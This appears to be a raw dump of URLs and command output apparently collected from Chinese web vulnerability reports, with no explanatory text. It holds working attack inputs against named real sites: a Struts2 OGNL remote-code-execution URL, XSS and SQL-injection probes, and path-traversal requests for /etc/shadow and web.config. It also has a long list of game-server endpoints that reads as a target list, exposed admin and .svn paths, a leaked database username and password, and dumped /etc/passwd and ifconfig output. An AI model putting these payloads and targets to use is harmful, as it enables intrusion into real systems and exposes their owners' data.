http://tech.sanygroup.com/service/JspSpyJDK5.jsp http://125.35.5.195:808/login.jsp http://155274965.vip.yy.com/ http://123456.vip.yy.com/ http://www.gdzl.gov.cn/trm/base/TrmHis!index.do http://www.njjnjsj.gov.cn/login/CmsSubmit.do http://www.gykj.gov.cn/login/Jeecms.do http://www.sdas.org/login/CmsSubmit.do http://www.jnxzsp.gov.cn http://www.jnxzsp.gov.cn/ViewSource/SrcNotice.aspx?infoFlowId=00547 http://gzonline.gov.cn/OutPortalsql/ViewSource/SrcNotice.aspx?infoflowId=00107 http://www.jnspzx-sd.gov.cn/ViewSource/SrcNotice.aspx?infoflowId=00233 http://www.jhxz.gov.cn/ViewSource/SrcNotice.aspx?infoflowId=00184 http://cysp.qingdao.gov.cn/ViewSource/SrcNotice.aspx?infoflowId=01019 http://xzfw.zhanjiang.gov.cn/ViewSource/SrcNotice.aspx?infoflowId=02358 http://www.bltzfw.gov.cn/wsbsdt/ViewSource/SrcNotice.aspx?infoflowId=00231 http://60.211.195.50/ViewSource/SrcNotice.aspx?infoflowId=00014 http://www.lsxzwfwzx.com/lssp/ViewSource/SrcNotice.aspx?infoflowId=00418 http://www.whaac.gov.cn/ViewSource/SrcNotice.aspx?infoflowId=01911 http://www.ytshenpi.cn/ViewSource/SrcNotice.aspx?infoflowId=00471'm http://www.leiphone.com/api/v4author.php?aid=1&pid=1 http://www.qqddc.com/lvyuanfighter.do?method=lyList&qid=1265&from=/admin/homeSiteNews.do?method=toadd http://g.youc.com http://plus.aili.com/include/.svn/ http://plus.aili.com/error/.svn/entries http://plus.aili.com/templates/.svn/ http://plus.aili.com/include/.svn/text-base/data.class.php.svn-base http://www.xjfp.gov.cn/admin/ http://www.xjfp.gov.cn/admin_config.aspx http://hm.xjfp.gov.cn/admin/ http://hm.xjfp.gov.cn/admin_config.aspx https://www3.hicloud.com/user/login.action?request_locale=zh_HK eth0:acce encap:Ethernet addr:172.22.192.9 Bcast:172.22.192.255 Mask:255.255.255.0 MTU:1500 eth0:serv encap:Ethernet addr:192.168.1.103 Bcast:192.168.1.255 Mask:255.255.255.0 MTU:1500 eth0:acce encap:Ethernet addr:172.22.192.10 Bcast:172.22.192.255 Mask:255.255.255.0 MTU:1500 eth0:serv encap:Ethernet addr:192.168.1.104 
Bcast:192.168.1.255 Mask:255.255.255.0 MTU:1500 https://www6.hicloud.com/user/login.action http://220.181.168.128/ http://220.181.168.128:8080/user/login# http://kf.youc.com/ http://kf.youc.com/plus/mytag_js.php?aid=9090 https://www5.hicloud.com/guide/showAnZhuo.action https://www.hicloud.com/guide/showAnZhuo.action https://www2.hicloud.com/guide/showAnZhuo.action https://www4.hicloud.com/guide/showAnZhuo.action encap:Ethernet addr:10.32.2.121 Bcast:10.32.2.255 Mask:255.255.255.0 MTU:1500 packets:98120090 txqueuelen:1000 http://www.sz[马赛克].gov.cn/ http://ec.crcc.cn/b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=text&fjbh=web&fjml=/WEB-INF/ http://ec.crcc.cn/b2b/web/uploadAction.do?method=downLoad&fileType=text&fileName=/etc/shadow http://ec.crcc.cn/b2b/web/two/indexinfoAction.do?actionType=showOneProduct&xh=2&dwbm=-1 http://122.224.96.66/wappda.asp?Method=GET&Name=560001115481 http://drops.wooyun.org/tips/143 http://www.freebuf.com/articles/web/5411.html http://www.zjcrb.cn/fckeditor/editor/filemanager/upload/test.html http://220.181.109.120:8080/ http://www.chinacourt.org/article/index/id/MzAwNDDIMCAOAAA%3D.shtml http://www.nercb.cas.cn/login/NercbLogin.do http://www.magnotel.com/Inn/chains.aspx?UnitID=9006 http://www.cast.org.cn http://app03.cast.org.cn/guestbook/del.jsp?id= http://wapplat.tom.com/ivr/ivr_ring_admin.jsp http://cpadmin.ule.tom.com/cpadmin/staff.do?method=doQuery http://cpadmin.ule.tom.com/cpadmin/login.do http://merchant2.ule.tom.com/seller/login.do DB:61.155.xxx.xx:1521:orcl user:zjgweb pass:zjgweb http://xss.com http://localhost/xss.css http://203.88.202.81:8080/gzjf/common/sqrdl.action http://www.max78.com/Pay/PayIndex.aspx http://www.nd56.com/address.asp?site=%B0%CD%D6%D0%CA%D0 http://msg.mail.163.com/cgi/mc?username=%3Cscript%3Ealert%281%29%3C/script%3E http://msg.vip.163.com/cgi/mc?username=%3Cscript%3Ealert%281%29%3C/script%3E http://msg.vip.126.com/cgi/mc?username=%3Cscript%3Ealert%281%29%3C/script%3E 
http://msg.vip.126.com/cgi/mc?username=%3Cscript%3Ealert%281%29%3C/script%3E http://www.cnfpzz.com http://www.cnfpzz.com/NewsList.aspx http://www.cnfpzz.com/NewsList.aspx?MenuID=242为例 http://www.cncscs.org http://www.cncscs.org/view.asp?id=3331 http://www.shanxilr.gov.cn/山西国土资源厅 http://www.shanxilr.gov.cn/manage/Admin_login.asp http://www.shanxilr.gov.cn/manage/Admin_Page.asp http://www.shanxilr.gov.cn/x.asp http://www.shanxilr.gov.cn/Cnnsc.asp http://www.shanxilr.gov.cn/Cnnsc.asp http://www.shanxilr.gov.cn/x.asp www.che168.com http://cs.beta.ulechina.tom.com/feedback/toUsrQuery.do http://www.ehuafeng.com/oa/default.asp http://cpadmin.ule.tom.com/postsalesummary.jsp http://cpadmin.ule.tom.com/cpadmin/staff.do?method=doQuery http://www.lsgtzy.com/Second_DownLoadFile.aspx?name=../../web.config http://www.58.sc.cn/ http://s-40448.gotocdn.com为织梦,上exp,秒之 http://s-40448.gotocdn.com/plus/siling.aspx http://58.sc.cn/1937cN.html http://xc.uc.cn/bbs/data/attachment/forum/201307/14/184409pi1x9ztt94440ap0.gif/.php http://media.ccidedu.com/ http://dl.ccidnet.com/ ftp://115.182.21.17/rk/ http://zone.wooyun.org/content/4537。 http://12094.mmb.cn/wap/touch/home/index.jsp http://12094.mmb.cn/wap/findpassword/sendBandPhoneNum.do?findPasswordIndex=1 http://12094.mmb.cn/wap/findpassword/sendNewPassword.do http://yunda.yonyou.com/index.do http://218.28.206.52:8080/ http://auto.ynet.com/ppbase/pphotos.php?b=%B3%A4%B0%B2%B8%A3%CC%D8&s=1517 http://auto.ynet.com/admin/ http://www.tudou.com/my/setting/private.action http://pan.baidu.com/share/link?shareid=532369&uk=1594048901 http://www.verycd.com/blog/?author=1 http://www.verycd.com/blog/wp-login.php http://www.verycd.com/blog/about/ http://120.132.144.18/checkLogin.action http://love.syradio.cn/admin/main.php http://www.dzpost.com,然后看图 http://www.dzpost.com/shbgl/shb_search_xx.asp?action=search&h=,然后看图 http://lottery.sports.sohu.com/esunmanage http://lottery.sports.sohu.com/esunmanage/Admin/Tpl/default/Index/ 
http://lottery.sports.sohu.com/esunmanage/Admin/index.php/Public/login http://www.che168.com/Personal/Buy_46407.html?22:47:02 http://terminal.chinaef.com/system/defaultLogin.action http://www.glqh.com/login/Jeecms.do http://shuping.hjsm.tom.com/js/fckeditor/editor/filemanager/connectors/test.html# http://27.115.28.248:8066/WebResource.axd?d=4mc-jQVbXmJ0NXBf42LyLA2&t=634540161289277627 http://27.115.28.248:8066/WebResource.axd?d=meB-ylNiPxIKJ9u6Gwq788rr2avhLzUrwXgJ0KofnAA1&t=634540161289277627 http://27.115.28.248:8066/WebResource.axd?d=4mc-jQVbXmJ0NXBf42LyLA2 http://hters.htinns.com/HTERS/WebResource.axd?d=AaGjA0eJsGoyRvmFPN8ttw2 http://hters.htinns.com/HTERS/ScriptResource.axd http://pan.baidu.com/share/link?shareid=532369&uk=1594048901 http://jcxt.htinns.com/WebResource.axd?d=GecXR2RIyY_JNrCvsOavmQ2&t=634606828247982112 http://jcxt.htinns.com/WebResource.axd?d=GecXR2RIyY_JNrCvsOavmQ2 http://jcxt.htinns.com/ScriptResource.axd http://qpb.eastday.com http://qpb.eastday.com/index.asp http://qpb.eastday.com/data/dbbak/ http://data.news.163.com/cacti/cacti.sql http://data.news.163.com/htdocs/.bash_history http://data.news.163.com:80/htdocs/.svn/entries http://stat.verycd.com/admin/ http://stat.verycd.com/admin/easymule/index.php?between=date&b_le=2013-07-14&b_ge=2013-07-14 http://www.xd.com/hr/?author=1 http://www.dfyb.com http://www.dfyb.com/newcenter/Newscenter_Detail.asp?news_id=179 http://www.xfj.suzhou.gov.cn http://www.xfj.suzhou.gov.cn/1937cN.txt http://wbxq.gov.cn http://wbxq.gov.cn/1937cN.txt http://xxgk.zhumadian.gov.cn http://xxgk.zhumadian.gov.cn/1937cN.txt http://oa.zhangye.gov.cn http://oa.zhangye.gov.cn//1937cN.txt http://lzhx.czolgame.com/bbs/admin.php http://es.ucweb.com/wor/my_brand?product_id=21870&type=0&la= http://minisite.youku.com/autobaojun/view.php?id=1189 
http://s58.as.game.yy.com/root/chat.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 http://astd22.my4399.com/root/chat.action http://astd26.g.pps.tv/root/chat.action http://astd27.g.pps.tv/root/chat.action http://gameas4.pipi.cn/root/chat.action http://s1.as.8zy.com/root/chat.action http://s17.as.jinjuzi.com/root/chat.action http://s4.as.91.com/root/chat.action http://s4.astd.wan.rising.cn/root/chat.action http://s4.asyh.uoyoo.cn/root/chat.action http://s69.astd.6711.com/root/chat.action http://s7.astd.ifeng.com/root/chat.action http://td6.huanlang.com/root/chat.action http://td8.zhulang.com/root/chat.action http://as1.game.tiexue.net/root/chat.action http://astd.s1.53wan.com/root/chat.action http://s66.as.peiyou.com/root/chat.action http://as1.51wan.com/root/chat.action http://astd17.29ww.com/root/chat.action http://s319.as.yaowan.com/root/chat.action http://s622.as.yaowan.com/root/chat.action http://s11.astd.cga.com.cn/root/chat.action http://s167.as.yaowan.com/root/chat.action http://s3.astd.g.pptv.com/root/chat.action http://s588.as.yaowan.com/root/chat.action http://s80.astd.6711.com/root/chat.action http://astd10.youxi567.com/root/chat.action http://s1.3896.com/root/chat.action http://s28.astd.6711.com/root/chat.action http://s69.as.yaowan.com/root/chat.action http://s77.astd.6711.com/root/chat.action http://as2.neotv.jiuwan.com/root/chat.action 
http://s116.astd.37wan.com/root/chat.action http://s184.as.yaowan.com/root/chat.action http://s605.as.yaowan.com/root/chat.action http://x16.aoshi.renren.com/root/chat.action http://s1.as.158wan.com/root/chat.action http://s26.astd.37wan.com/root/chat.action http://s328.as.yaowan.com/root/chat.action http://s577.as.yaowan.com/root/chat.action http://s89.as.peiyou.com/root/chat.action http://x4.aoshi.renren.com/root/chat.action http://astd1.youxi567.com/root/chat.action http://astds8.snsfun.com/root/chat.action http://s1.as.96pk.com/root/chat.action http://s111.as.yaowan.com/root/chat.action http://s15.astd.kuwo.cn/root/chat.action http://s397.as.yaowan.com/root/chat.action http://s42.as.game.yy.com/root/chat.action http://s603.as.yaowan.com/root/chat.action http://astd.s5.53wan.com/root/chat.action http://s1.astd.smggame.net/root/chat.action http://s573.as.yaowan.com/root/chat.action http://s6.as.pcgames.com.cn/root/chat.action http://gameas1.pipi.cn/root/chat.action http://s2.astd.cga.com.cn/root/chat.action http://s298.as.yaowan.com/root/chat.action http://s59.as.yaowan.com/root/chat.action http://x12.aoshi.renren.com/root/chat.action http://x14.aoshi.renren.com/root/chat.action http://s1.as.aoshitang.com/root/chat.action http://s1.astd.6one.com.cn/root/chat.action http://s1.astd.91555.com/root/chat.action http://s123.as.yaowan.com/root/chat.action http://s17.astd.g.1360.com/root/chat.action http://s3.as.jinjuzi.com/root/chat.action http://s52.astd.6711.com/root/chat.action http://s585.as.yaowan.com/root/chat.action http://s8.astd.51.com/root/chat.action http://s92.astd.37wan.com/root/chat.action http://assvr1.webgame.xunlei.com/root/chat.action http://s16.as.56uu.com/root/chat.action http://s163.as.yaowan.com/root/chat.action http://s28.as.peiyou.com/root/chat.action http://s75.astd.37wan.com/root/chat.action http://res9.astd.cn/root/chat.action http://s101.as.yaowan.com/root/chat.action http://s6.astd.6711.com/root/chat.action 
http://td1.huanlang.com/root/chat.action http://x21.aoshi.renren.com/root/chat.action http://astd06.game.qidian.com/root/chat.action http://astd3.29ww.com/root/chat.action http://astds1.snsfun.com/root/chat.action http://s01.as.3722.com/root/chat.action http://s32.baidu.astd.cn/root/chat.action http://s62.as.game.yy.com/root/chat.action http://astd07.game.qidian.com/root/chat.action http://s103.as.yaowan.com/root/chat.action http://s534.as.yaowan.com/root/chat.action http://s94.astd.6711.com/root/chat.action http://s18.as.game.yy.com/root/chat.action http://s613.as.yaowan.com/root/chat.action http://frxxz11.game.bnbwan.com/root/chat.action http://frxxz12.game.bnbwan.com/root/chat.action http://s17.baidu.astd.cn/root/chat.action http://s621.as.yaowan.com/root/chat.action http://s95.as.peiyou.com/root/chat.action http://td09.jianggame.com/root/chat.action http://td23.zhulang.com/root/chat.action http://s34.astd.6711.com/root/chat.action http://s427.as.yaowan.com/root/chat.action http://s608.as.yaowan.com/root/chat.action http://s79.as.yaowan.com/root/chat.action http://s9.as.56uu.com/root/chat.action http://td17.zhulang.com/root/chat.action http://5.astd.youwo.com/root/chat.action http://s1.astd.kuwo.cn/root/chat.action http://astd09.game.qidian.com/root/chat.action http://s10.astd.cga.com.cn/root/chat.action http://s2.astd.tianya.cn/root/chat.action http://s59.as.peiyou.com/root/chat.action http://s632.as.yaowan.com/root/chat.action http://s9.astd.cga.com.cn/root/chat.action http://x1.aoshi.renren.com/root/chat.action http://astd44.g.pps.tv/root/chat.action http://hs35.as.yaowan.com/root/chat.action http://s32.astd.g.1360.cn/root/chat.action http://s32.astd.g.1360.com/root/chat.action http://s56.as.peiyou.com/root/chat.action http://s582.as.yaowan.com/root/chat.action http://s66.as.game.yy.com/root/chat.action http://td001.webxgame.com/root/chat.action http://td50.zhulang.com/root/chat.action http://x20.aoshi.renren.com/root/chat.action 
http://s2.frxx.qidian.com/root/chat.action http://s3.frxx.qidian.com/root/chat.action http://s82.as.yaowan.com/root/chat.action http://s8.frxx.qidian.com/root/chat.action http://s9.frxx.qidian.com/root/chat.action http://s616.as.yaowan.com/root/chat.action http://s77.as.yaowan.com/root/chat.action http://tdh1.kuwan8.com/root/chat.action http://wap.astd.cn/root/chat.action http://118.26.234.23/root/chat.action http://s241.as.yaowan.com/root/chat.action http://s479.as.yaowan.com/root/chat.action http://s66.astd.37wan.com/root/chat.action http://s211.as.yaowan.com/root/chat.action http://s280.as.yaowan.com/root/chat.action http://s5.as.kugou.com/root/chat.action http://s629.as.yaowan.com/root/chat.action http://s89.as.yaowan.com/root/chat.action http://s7.frxx.qidian.com/root/chat.action http://s482.as.yaowan.com/root/chat.action http://s71.astd.37wan.com/root/chat.action http://s91.as.peiyou.com/root/chat.action http://s126.astd.37wan.com/root/chat.action http://s169.as.yaowan.com/root/chat.action http://s82.as.peiyou.com/root/chat.action http://s93.as.game.yy.com/root/chat.action http://118.26.234.28/root/chat.action http://s129.as.yaowan.com/root/chat.action http://s130.as.yaowan.com/root/chat.action http://s24.as.womenwan.com/root/chat.action http://astds3.snsfun.com/root/chat.action http://s561.as.yaowan.com/root/chat.action http://s72.as.game.yy.com/root/chat.action http://s78.as.peiyou.com/root/chat.action http://astd24.g.pps.tv/root/chat.action http://s1.astd.ifeng.com/root/chat.action http://s10.as.8zy.com/root/chat.action http://s100.as.yaowan.com/root/chat.action http://s2.astd.6one.com.cn/root/chat.action http://s2.astd.wan.rising.cn/root/chat.action http://s7.as.aoshitang.com/root/chat.action http://s7.as.jiuwan.com/root/chat.action http://s99.as.yaowan.com/root/chat.action http://td30.huanlang.com/root/chat.action http://td37.jianggame.com/root/chat.action http://x19.aoshi.renren.com/root/chat.action http://s93.as.yaowan.com/root/chat.action 
http://s94.as.yaowan.com/root/chat.action http://s134.as.yaowan.com/root/chat.action http://s132.astd.37wan.com/root/chat.action http://s204.as.yaowan.com/root/chat.action http://s205.as.yaowan.com/root/chat.action http://s612.as.yaowan.com/root/chat.action http://s232.as.yaowan.com/root/chat.action http://s50.as.game.yy.com/root/chat.action http://s54.astd.6711.com/root/chat.action http://s57.as.peiyou.com/root/chat.action http://astd25.g.pps.tv/root/chat.action http://hs35.as.yaowan.com/root/chat.action http://s10-x.as.178.com/root/chat.action http://s136.as.yaowan.com/root/chat.action http://s28.astd.g.1360.com/root/chat.action http://s5.3896.com/root/chat.action http://s82.as.game.yy.com/root/chat.action http://s104.as.peiyou.com/root/chat.action http://s29.as.aoshitang.com/root/chat.action http://s29.as.jiuwan.com/root/chat.action http://s373.as.yaowan.com/root/chat.action http://s56.astd.37wan.com/root/chat.action http://as1.game.verycd.com/root/chat.action http://astd34.g.pps.tv/root/chat.action http://s41.as.aoshitang.com/root/chat.action http://s58.as.peiyou.com/root/chat.action http://s625.as.yaowan.com/root/chat.action http://td31.huanlang.com/root/chat.action http://s1.astd.g.pptv.com/root/chat.action http://s13.as.womenwan.com/root/chat.action http://s443.as.yaowan.com/root/chat.action http://s52.as.game.yy.com/root/chat.action http://s596.as.yaowan.com/root/chat.action http://s79.astd.6711.com/root/chat.action http://s8.astd.game2.com.cn/root/chat.action http://astd1.uusee.com/root/chat.action http://s170.as.yaowan.com/root/chat.action http://s3.astd.51.com/root/chat.action http://s265.as.yaowan.com/root/chat.action http://s266.as.yaowan.com/root/chat.action http://astd1.78bar.com/root/chat.action http://astds5.snsfun.com/root/chat.action http://s105.as.yaowan.com/root/chat.action http://s4.astd.6711.com/root/chat.action http://s46.as.aoshitang.com/root/chat.action http://as901.51wan.com/root/chat.action http://s1.as.kugou.com/root/chat.action 
http://s139.as.yaowan.com/root/chat.action http://s140.as.yaowan.com/root/chat.action http://s38.astd.6711.com/root/chat.action http://s1.astd.51.com/root/chat.action http://s510.as.yaowan.com/root/chat.action http://s29.astd.game2.com.cn/root/chat.action http://s48.as.aoshitang.com/root/chat.action http://s50.astd.37wan.com/root/chat.action http://s103.astd.37wan.com/root/chat.action http://s14.as.jiuwan.com/root/chat.action http://s38.astd.g.1360.com/root/chat.action http://s551.as.yaowan.com/root/chat.action http://as14.xdwan.com/root/chat.action http://s549.as.yaowan.com/root/chat.action http://s1.astd.37wan.com/root/chat.action http://s16.as.yaowan.com/root/chat.action http://s39.as.peiyou.com/root/chat.action http://s611.as.yaowan.com/root/chat.action http://s10.as.91.com/root/chat.action http://s122.astd.37wan.com/root/chat.action http://s4.astd.g.pptv.com/root/chat.action http://s521.as.yaowan.com/root/chat.action http://s576.as.yaowan.com/root/chat.action http://td62.webxgame.com/root/chat.action http://s3.as.yaowan.com/root/chat.action http://s6.astd.g.1360.com/root/chat.action http://as1.neotv.jiuwan.com/root/chat.action http://astd29.g.pps.tv/root/chat.action http://astd9.uusee.com/root/chat.action http://s1.as.uc55.cn/root/chat.action http://s1.astd.g.1360.com/root/chat.action http://s11.astd.ifeng.com/root/chat.action http://s143.as.yaowan.com/root/chat.action http://s35.as.aoshitang.com/root/chat.action http://s592.as.yaowan.com/root/chat.action http://s6.astd.baofenggame.com/root/chat.action http://s6.astd.wan.rising.cn/root/chat.action http://s70.as.game.yy.com/root/chat.action http://as17.xdwan.com/root/chat.action http://s145.as.yaowan.com/root/chat.action http://s464.as.yaowan.com/root/chat.action http://s83.astd.37wan.com/root/chat.action http://s88.as.yaowan.com/root/chat.action http://astd01.game.qidian.com/root/chat.action http://s1.as.womenwan.com/root/chat.action http://s124.as.womenwan.com/root/chat.action 
http://s421.as.yaowan.com/root/chat.action http://s571.as.yaowan.com/root/chat.action http://s20.as.56uu.com/root/chat.action http://s497.as.yaowan.com/root/chat.action http://s78.as.game.yy.com/root/chat.action http://s1.astd.snstele.com/root/chat.action http://s22.as.yaowan.com/root/chat.action http://s590.as.yaowan.com/root/chat.action http://td25.huanlang.com/root/chat.action http://as3.neotv.jiuwan.com/root/chat.action http://s1.as.3737.com/root/chat.action http://s188.as.yaowan.com/root/chat.action http://s40.as.peiyou.com/root/chat.action http://s40.as.womenwan.com/root/chat.action http://s595.as.yaowan.com/root/chat.action http://s1.kaixin.astd.cn/root/chat.action http://s539.as.yaowan.com/root/chat.action http://s80.as.peiyou.com/root/chat.action http://s171.as.yaowan.com/root/chat.action http://s32.as.peiyou.com/root/chat.action http://x7.aoshi.renren.com/root/chat.action http://s1.astd.niua.com/root/chat.action http://s5.as.womenwan.com/root/chat.action http://s620.as.yaowan.com/root/chat.action http://s9-x.as.178.com/root/chat.action http://s148.as.yaowan.com/root/chat.action http://s525.as.yaowan.com/root/chat.action http://s113.astd.37wan.com/root/chat.action http://s352.as.yaowan.com/root/chat.action http://s574.as.yaowan.com/root/chat.action http://td15.webxgame.com/root/chat.action http://astd.s3.53wan.com/root/chat.action http://s455.as.yaowan.com/root/chat.action http://s103.as.peiyou.com/root/chat.action http://s50.as.56uu.com/root/chat.action http://s500.as.yaowan.com/root/chat.action http://s609.as.yaowan.com/root/chat.action http://s14.astd.37wan.com/root/chat.action http://s1-x.as.178.com/root/chat.action http://s75.as.yaowan.com/root/chat.action http://s8.as.91.com/root/chat.action http://s514.as.yaowan.com/root/chat.action http://s560.as.yaowan.com/root/chat.action http://td5.zhulang.com/root/chat.action http://s1.baidu.astd.cn/root/chat.action http://s1.weibo.astd.cn/root/chat.action http://s133.as.yaowan.com/root/chat.action 
http://s1.astd.cga.com.cn/root/chat.action http://s1.astd.uz73.com/root/chat.action http://s2.astd.cga.com.cn/root/chat.action http://s30.as.jinjuzi.com/root/chat.action http://s34.astd.37wan.com/root/chat.action http://as15.51wan.com/root/chat.action http://as16.xdwan.com/root/chat.action http://s1.astd.ipark.cn/root/chat.action http://s107.as.peiyou.com/root/chat.action http://s155.as.yaowan.com/root/chat.action http://s384.as.yaowan.com/root/chat.action http://as1.xdwan.com/root/chat.action http://s30.baidu.astd.cn/root/chat.action http://s512.as.yaowan.com/root/chat.action http://s76.as.peiyou.com/root/chat.action http://s77.as.game.yy.com/root/chat.action http://s12.astd.cga.com.cn/root/chat.action http://s406.as.yaowan.com/root/chat.action http://s530.as.yaowan.com/root/chat.action http://s607.as.yaowan.com/root/chat.action http://td41.zhulang.com/root/chat.action http://s433.as.yaowan.com/root/chat.action http://s1.as.pcgames.com.cn/root/chat.action http://s244.as.yaowan.com/root/chat.action http://s31.astd.game2.com.cn/root/chat.action http://s40.astd.g.1360.com/root/chat.action http://s108.as.game.yy.com/root/chat.action http://s248.as.yaowan.com/root/chat.action http://s34.astd.g.1360.com/root/chat.action http://s45.as.aoshitang.com/root/chat.action http://s62.as.peiyou.com/root/chat.action http://as44.xdwan.com/root/chat.action http://s34.as.game.yy.com/root/chat.action http://td59.zhulang.com/root/chat.action http://s13.astd.kuwo.cn/root/chat.action http://s470.as.yaowan.com/root/chat.action http://td89.webxgame.com/root/chat.action http://s115.as.yaowan.com/root/chat.action http://s116.as.yaowan.com/root/chat.action http://s24.astd.game2.com.cn/root/chat.action http://s49.astd.6711.com/root/chat.action http://s51.as.aoshitang.com/root/chat.action http://as1.29293.com/root/chat.action http://astd20.g.pps.tv/root/chat.action http://s01.as.175pt.net/root/chat.action http://s11.as.8zy.com/root/chat.action http://s12.as.aoshitang.com/root/chat.action 
http://s3.asyh.uoyoo.cn/root/chat.action http://s579.as.yaowan.com/root/chat.action http://s7-x.as.178.com/root/chat.action http://s-9.as.jinjuzi.com/root/chat.action http://as1.91wan.com/root/chat.action http://s41.as.yaowan.com/root/chat.action http://s5.astd.cga.com.cn/root/chat.action http://s11-x.as.178.com/root/chat.action http://s1-2.astd.kuaiwan.com/root/chat.action http://s208.as.yaowan.com/root/chat.action http://s9.as.kugou.com/root/chat.action http://td18.huanlang.com/root/chat.action http://s119.as.yaowan.com/root/chat.action http://s68.as.game.yy.com/root/chat.action http://td86.webxgame.com/root/chat.action http://s200.as.yaowan.com/root/chat.action http://s33.baidu.astd.cn/root/chat.action http://s46.as.peiyou.com/root/chat.action http://s507.as.yaowan.com/root/chat.action http://s1.astd.funshion.com/root/chat.action http://s15.3896.com/root/chat.action http://s511.as.yaowan.com/root/chat.action http://s57.as.yaowan.com/root/chat.action http://s578.as.yaowan.com/root/chat.action http://astd14.g.pps.tv/root/chat.action http://s1.astd.game2.com.cn/root/chat.action http://astd19.g.pps.tv/root/chat.action http://s1.as.yaowan.com/root/chat.action http://s53.as.aoshitang.com/root/chat.action http://s85.astd.6711.com/root/chat.action http://astds11.snsfun.com/root/chat.action http://s391.as.yaowan.com/root/chat.action http://x23.aoshi.renren.com/root/chat.action http://s11.astd.51.com/root/chat.action http://s147.as.peiyou.com/root/chat.action http://s182.as.yaowan.com/root/chat.action http://s36.astd.g.1360.com/root/chat.action http://s518.as.yaowan.com/root/chat.action http://td17.webxgame.com/root/chat.action http://s100.astd.37wan.com/root/chat.action http://s499.as.yaowan.com/root/chat.action http://s8.astd.6711.com/root/chat.action http://s27.as.56uu.com/root/chat.action http://s4-x.as.178.com/root/chat.action http://s584.as.yaowan.com/root/chat.action http://s601.as.yaowan.com/root/chat.action http://s11.astd.kuwo.cn/root/chat.action 
http://s165.as.yaowan.com/root/chat.action http://s532.as.yaowan.com/root/chat.action http://astd.s2.53wan.com/root/chat.action http://s1.as.kedou.com/root/chat.action http://s630.as.yaowan.com/root/chat.action http://td1.zhulang.com/root/chat.action http://s1.as.feixue.com/root/chat.action http://s25.baidu.astd.cn/root/chat.action http://s43.as.aoshitang.com/root/chat.action http://s558.as.yaowan.com/root/chat.action http://s13-x.as.178.com/root/chat.action http://s253.as.yaowan.com/root/chat.action http://s58.as.game.yy.com/root/chat.action http://td13.zhulang.com/root/chat.action http://s27.baidu.astd.cn/root/chat.action http://s45.astd.6711.com/root/chat.action http://s536.as.yaowan.com/root/chat.action http://s54.as.game.yy.com/root/chat.action http://td56.zhulang.com/root/chat.action http://s223.as.yaowan.com/root/chat.action http://s3.astd.cga.com.cn/root/chat.action http://s545.as.yaowan.com/root/chat.action http://s277.as.yaowan.com/root/chat.action http://s540.as.yaowan.com/root/chat.action http://s566.as.yaowan.com/root/chat.action http://s9.3896.com/root/chat.action http://www.dreamore.com/projects?type=3%20and%201=2 http://www.dreamore.com/dreamblog?type=4%20and%201=2 http://www.dreamore.com/projects?keywords=1%20and%201=2 URL:http://www.isstec.org.cn/index.php/Index/listcert/certype/注入点 http://ykt.10086.cn/APC/Index.html http://218.206.27.3/CMOC/default.aspx?area=20 http://www.todaynic.com) http://www.uvip.cn/ http://www.uvip.cn/处进行登录 http://account.9aoduo.com/register/register.action encap:Ethernet B8:AC:6F:94:C8:DF addr:192.168.165.48 Bcast:192.168.165.255 Mask:255.255.255.0 MTU:1500 packets:14502378890 packets:19444044575 txqueuelen:1000 http://www.lkwan.com/phone/about/disclaimer.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 
halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin saslauth:x:498:496:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin qemu:x:107:107:qemu user:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin bp:x:500:501:bp:/home/bp:/bin/bash test:x:501:502::/home/test:/bin/bash nginx:x:502:503::/home/nginx:/sbin/nologin system:x:0:0::/tmpo:/bin/bash http://117.79.149.40/ 
